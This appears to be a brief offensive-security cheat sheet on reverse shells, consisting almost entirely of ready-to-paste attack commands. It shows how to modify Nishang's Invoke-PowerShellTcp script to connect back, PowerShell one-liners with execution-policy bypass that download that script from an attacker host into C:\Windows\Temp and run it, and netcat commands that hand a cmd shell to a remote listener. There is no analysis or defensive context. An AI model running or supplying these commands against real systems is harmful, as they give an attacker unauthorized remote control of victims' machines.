Reverse Shells
Nishang
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add line to ending:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 80
cmd.exe /c powershell.exe -ep bypass Invoke-WebRequest -Uri 'http://192.168.1.1/Invoke-PowerShellTcp.ps1' -OutFile 'C:\Windows\Temp\s.ps1'
cmd.exe /c powershell.exe -ep bypass -File C:\Windows\Temp\s.ps1"
Netcat
nc -e {shell} {LHOST} {LPORT}
nc.exe -e cmd 192.168.1.1 80
Last updated